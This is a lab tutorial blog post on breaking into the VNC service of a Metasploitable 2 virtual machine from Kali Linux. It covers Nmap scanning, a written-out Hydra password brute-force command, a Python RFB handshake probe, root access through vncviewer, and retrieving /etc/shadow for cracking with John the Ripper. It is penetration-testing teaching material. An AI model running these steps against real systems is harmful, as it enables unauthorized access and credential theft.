Monday 1 December 2014

Attacking Metasploitable VNC Services


In this tutorial we will exploit the VNC service running on Metasploitable 2. VNC lets administrators control a machine's desktop remotely, so a VNC server found during a scan (normally on TCP port 5900) should always be checked for weak or default passwords.

To demonstrate this attack we use Kali Linux (as attacker) and Metasploitable 2 (as victim), both running on VirtualBox. If you need help setting up Kali Linux, look here.

Kali Linux: 192.168.1.7
Metasploitable: 192.168.1.4

The first thing to do is fingerprint the Metasploitable server to see which services are open. This can be done with Nmap: open a terminal and enter the command below (if you are using different IPs, substitute your own).


As you can see there are a lot of open services; for this tutorial we will focus on VNC on port 5900.

Exploitation

Now that we have identified that the service is running we can check whether it is using a weak or default password. To do this we use Hydra, a network logon cracker.
The command below runs Hydra against the VNC service with a password list, and as you can see it has found the password: password
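Before pointing Hydra at port 5900 it is worth confirming what the server actually offers. The RFB handshake advertises the server's security types in the clear, and the answer decides whether a password guess is even needed (type 1, "None") or whether Hydra's vnc module applies at all (type 2, classic VNC Authentication, a DES challenge/response with a password and no username). The Python probe below is an added example written for this page, not code from the original post. It completes the version handshake, reads the security-type list, and ships with a constructed fake RFB 3.8 server on localhost so it runs offline; `probe_vnc`, `assess`, `demo` and the fake server are illustrative names, not part of any VNC tool.

```python
import socket
import struct
import threading

# RFB security types (from the RFB protocol spec). 1 means no password at all;
# 2 is classic VNC Authentication, the mechanism Hydra's vnc module attacks.
SECURITY_TYPES = {
    0: "Invalid",
    1: "None",
    2: "VNC Authentication",
    5: "RA2",
    6: "RA2ne",
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
}


def recv_exact(sock, n):
    """Read exactly n bytes, or raise if the peer hangs up first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def probe_vnc(host, port=5900, timeout=5.0):
    """Do the RFB version handshake; return (server_version, [security type ids])."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = recv_exact(s, 12)                       # e.g. b"RFB 003.008\n"
        if not banner.startswith(b"RFB "):
            raise ValueError("not an RFB server, banner %r" % banner)
        version = banner.decode("ascii").strip()
        major, minor = int(version[4:7]), int(version[8:11])
        if (major, minor) >= (3, 7):
            # 3.7+: reply with the highest version we share, then the server
            # sends a count byte followed by one byte per supported type.
            s.sendall(b"RFB 003.008\n" if (major, minor) >= (3, 8) else b"RFB 003.007\n")
            count = recv_exact(s, 1)[0]
            if count == 0:                               # refused; a reason string follows
                reason_len = struct.unpack(">I", recv_exact(s, 4))[0]
                raise ConnectionError(recv_exact(s, reason_len).decode("ascii", "replace"))
            types = list(recv_exact(s, count))
        else:
            # 3.3: the server dictates a single type as a 4-byte big-endian integer.
            s.sendall(b"RFB 003.003\n")
            types = [struct.unpack(">I", recv_exact(s, 4))[0]]
        return version, types


def assess(types):
    """Translate the offered types into names and a verdict for the attacker."""
    names = [SECURITY_TYPES.get(t, "unknown(%d)" % t) for t in types]
    if 1 in types:
        verdict = "no authentication at all: connect with vncviewer directly"
    elif 2 in types:
        verdict = "VNC Authentication: password only, no username, try Hydra with a wordlist"
    else:
        verdict = "only stronger mechanisms offered, Hydra's vnc module will not apply"
    return names, verdict


def _fake_rfb_server(listener, types):
    """Constructed stand-in for a VNC server so the probe can run offline."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(b"RFB 003.008\n")
        recv_exact(conn, 12)                             # the client's version reply
        conn.sendall(bytes([len(types)]) + bytes(types))
    listener.close()


def demo(types=(2,)):
    """Probe the constructed server; returns (version, offered types, verdict)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=_fake_rfb_server, args=(listener, list(types)), daemon=True)
    t.start()
    version, offered = probe_vnc("127.0.0.1", port)
    t.join(timeout=5)
    _, verdict = assess(offered)
    return version, offered, verdict


if __name__ == "__main__":
    # Against the lab target you would call probe_vnc("192.168.1.4") instead of demo().
    print(demo())
```

Against the lab target, `assess(probe_vnc("192.168.1.4")[1])` replaces the demo. If the result is type 2, the Hydra step needs only a password list because VNC Authentication has no username, for example `hydra -P passwords.txt -t 4 192.168.1.4 vnc`. Keep the task count low: some VNC servers (RealVNC among them) temporarily blacklist a client after a handful of failed attempts, which would stall the run.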


Now that we know the password we can connect with vncviewer, entering "password" when prompted.


We are now connected as root on the Metasploitable box. The last thing to do is extract useful information such as password hashes. On Linux these are stored in /etc/shadow, which is readable only by root, so the VNC session gives us exactly the access needed. Retrieve the file and run a password cracking tool such as John the Ripper against it.

